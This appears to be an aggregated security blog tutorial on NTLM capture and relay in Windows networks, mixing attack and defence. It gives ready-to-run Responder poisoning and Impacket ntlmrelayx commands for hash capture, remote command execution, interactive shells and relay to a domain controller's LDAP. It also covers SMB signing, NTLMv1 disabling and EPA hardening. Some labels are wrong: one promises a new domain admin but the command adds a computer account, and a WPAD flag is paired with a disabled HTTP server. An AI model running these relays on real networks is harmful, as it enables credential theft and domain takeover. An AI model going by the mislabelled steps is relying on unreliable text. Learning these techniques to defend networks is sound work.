Listen to this Post
Introduction:
NTLM (NT LAN Manager) authentication remains a prevalent and often vulnerable protocol in Windows environments. Understanding its capture and relay techniques is fundamental for both red teamers aiming to exploit network weaknesses and blue teamers tasked with defending them. This guide demystifies the complexities of NTLM attacks, providing actionable commands and configurations to master this critical attack vector.
Learning Objectives:
- Understand the core mechanics of NTLM capture and relay attacks.
- Learn to deploy key tools like Responder and Impacket for exploitation.
- Implement critical defensive measures to mitigate NTLM relay risks.
You Should Know:
1. Intercepting NTLM Hashes with Responder
Responder is the Swiss Army knife for LLMNR, NBT-NS, and MDNS poisoning, tricking hosts into sending their NTLMv2 hashes to you.
Verified Commands & Configuration:
Install Responder git clone https://github.com/lgandx/Responder.git cd Responder Basic execution to capture hashes on the local interface sudo python3 Responder.py -I eth0 -v More aggressive mode with WPAD server and HTTP/SMB servers enabled sudo python3 Responder.py -I eth0 -rwv Analyze a captured hash cat Responder/logs/SMBv2-NTLMv2-SSP-10.0.0.15.txt
Step-by-step guide:
This tool listens for network name resolution requests. When a client mistakenly broadcasts a request for a non-existent host, Responder poisons the response, claiming to be that host. The victim then attempts to authenticate to Responder, handing over their NTLMv2 hash, which can be cracked offline with tools like Hashcat (hashcat -m 5600 hash.txt wordlist.txt).
2. The Art of SMB Relay with Impacket
Unlike capture, relay forwards the authentication attempt to a target machine, potentially granting direct command execution.
Verified Commands & Code Snippet:
Using Impacket's ntlmrelayx.py impacket-ntlmrelayx -tf targets.txt -smb2support -c "whoami" Relay for a specific command on successful relay impacket-ntlmrelayx -tf targets.txt -smb2support -c "ipconfig /all" Dump SAM database of the relayed-to host impacket-ntlmrelayx -tf targets.txt -smb2support Interactive SMB shell upon successful relay impacket-ntlmrelayx -tf targets.txt -smb2support -i
Step-by-step guide:
First, generate a list of potential relay targets (targets.txt). The `ntlmrelayx` module waits for incoming NTLM authentication attempts. When a hash is captured (e.g., from a Responder poison), it relays that credential to the machines listed in targets.txt. The `-c` flag executes a system command on the target if the relayed user has administrative privileges, while `-i` spawns an interactive SMB client.
3. Hardening Defenses: SMB Signing Enforcement
SMB signing prevents relay attacks by ensuring the packet originated from the expected host. If enforced, relay attacks fail.
Verified Windows Command:
Check the current SMB signing setting for the client Get-SmbClientConfiguration | Select-Object RequireSecuritySignature Check the current SMB signing setting for the server Get-SmbServerConfiguration | Select-Object RequireSecuritySignature, EnableSecuritySignature Enable SMB signing on the server (requires restart) Set-SmbServerConfiguration -RequireSecuritySignature $true -EnableSecuritySignature $true Enable SMB signing for the client Set-SmbClientConfiguration -RequireSecuritySignature $true
Step-by-step guide:
SMB signing is a configuration that digitally signs SMB packets. On the server side, `RequireSecuritySignature` should be set to `$true` to mandate signed communications. This setting is often found disabled on older OS versions or misconfigured networks. Use the `Get-` commands to audit your environment and the `Set-` commands to remediate, noting that a server restart may be required.
4. Blocking NTLMv1 and Leveraging Kerberos
NTLMv1 is cryptographically weak and should be disabled in favor of the more secure Kerberos protocol or, at a minimum, NTLMv2.
Verified Windows GPO/Registry Commands:
Check the current LAN Manager Authentication Level Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" | Select-Object LmCompatibilityLevel Set LAN Manager Auth Level to 5 (Send NTLMv2 response only. Refuse LM & NTLM) Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "LmCompatibilityLevel" -Value 5 Via Local Security Policy (secpol.msc) Navigate to: Security Settings -> Local Policies -> Security Options Set "Network security: LAN Manager authentication level" to "Send NTLMv2 response only. Refuse LM & NTLM"
Step-by-step guide:
The `LmCompatibilityLevel` registry value dictates the authentication negotiation behavior. A value of 5 forces the system to use only NTLMv2 and refuse weaker protocols. This can be deployed via Group Policy Object (GPO) across a domain to uniformly strengthen authentication, significantly reducing the risk of NTLMv1 capture and crack attacks.
5. Exploiting Web-based NTLM Authentication
Web servers configured for NTLM authentication can also be relay targets, potentially leading to unauthorized access to web applications.
Verified Impacket Command:
Relay HTTP NTLM authentication to an SMB target impacket-ntlmrelayx -t smb://10.0.0.20 -wh attacker-wpad --no-http-server Relay to a different web application impacket-ntlmrelayx -t http://internal-webapp/portal -wh attacker-wpad --no-smb-server
Step-by-step guide:
This attack vector uses the `-wh` flag to host a fake WPAD (Web Proxy Auto-Discovery) server, compelling the victim to send HTTP NTLM authentication to the attacker. This authentication stream is then relayed to a target service. The first command relays to an SMB share, while the second relays to another web application, which could grant access to sensitive internal portals if the relayed user has privileges.
6. Mitigating Relay with EPA and Channel Binding
Extended Protection for Authentication (EPA) uses Channel Binding Tokens (CBT) to tie the authentication request to the specific secure channel (like TLS), effectively neutralizing relay attacks for web services.
Verified IIS Configuration (Code Snippet):
<!-- This is configured via the IIS Manager GUI, but impacts web.config --> <!-- To require EPA for an application, set the `access` attribute to `Require` --> <system.webServer> <security> <authentication> <windowsAuthentication enabled="true"> <extendedProtection tokenChecking="Require" /> </windowsAuthentication> </authentication> </security> </system.webServer>
Step-by-step guide:
EPA is a server-side mitigation. In IIS, it’s enabled through the Authentication feature for a specific site or application. Setting `tokenChecking` to “Require” forces clients to present a CBT, proving the authentication request is for the original TLS session and not a relayed one. This should be implemented on all web servers using Windows Integrated Authentication.
7. Advanced Relay: From HTTP to LDAP
Relaying credentials to an LDAP service can be devastating, allowing for privilege escalation via techniques like Shadow Credentials or RBCD (Resource-Based Constrained Delegation).
Verified Impacket Command:
Relay to LDAP to perform a delegation attack impacket-ntlmrelayx -t ldaps://dc01.corp.local --delegate-access --no-smb-server -wh attacker-wpad Add a new domain admin user via relayed LDAP credentials impacket-ntlmrelayx -t ldaps://dc01.corp.local --add-computer EVILPC$ --no-smb-server
Step-by-step guide:
This advanced attack relays an captured NTLM session to the Domain Controller’s LDAP service. The `–delegate-access` option configures resource-based constrained delegation on a target computer object, giving the attacker control. The `–add-computer` option uses the relayed credentials to create a new machine account, which can then be added to privileged groups. Defenses include enabling LDAP signing and channel binding and minimizing domain admin logins.
What Undercode Say:
- The Attack Landscape is Evolving: Relay attacks have shifted from simple SMB-to-SMB to more complex, cross-protocol scenarios like HTTP-to-LDAP, which can lead to full domain compromise from a single, relayed authentication.
- Mitigation is a Multi-Layered Effort: No single setting provides complete protection. A robust defense requires enabling SMB signing, disabling NTLMv1, implementing EPA for web services, and hardening LDAP, all while promoting the use of Kerberos.
The persistence of NTLM in enterprise environments ensures that capture and relay attacks will remain a primary entry point for red teams and a significant threat from adversaries. While Microsoft pushes for its deprecation in favor of Kerberos, the reality is that NTLM is deeply embedded. The offensive community’s development of new relay techniques, especially against higher-value protocols like LDAP, demonstrates the need for continuous defensive adaptation. The tables and cheatsheets shared by practitioners are not just offensive aids but vital blueprints for defenders to understand the attack paths they must shut down.
Prediction:
The future of NTLM exploitation will increasingly leverage AI-driven automation to identify misconfigurations and vulnerable service combinations in real-time during penetration tests. Furthermore, as legacy systems are phased out and modern security controls like EPA and SMB signing become standard, attackers will pivot towards compromising middle-tier services (like SCADA historians or API gateways) that still require NTLM fallback, making supply chain and third-party application security the next critical battleground for this decades-old protocol.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Johnfordsecurity Do – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
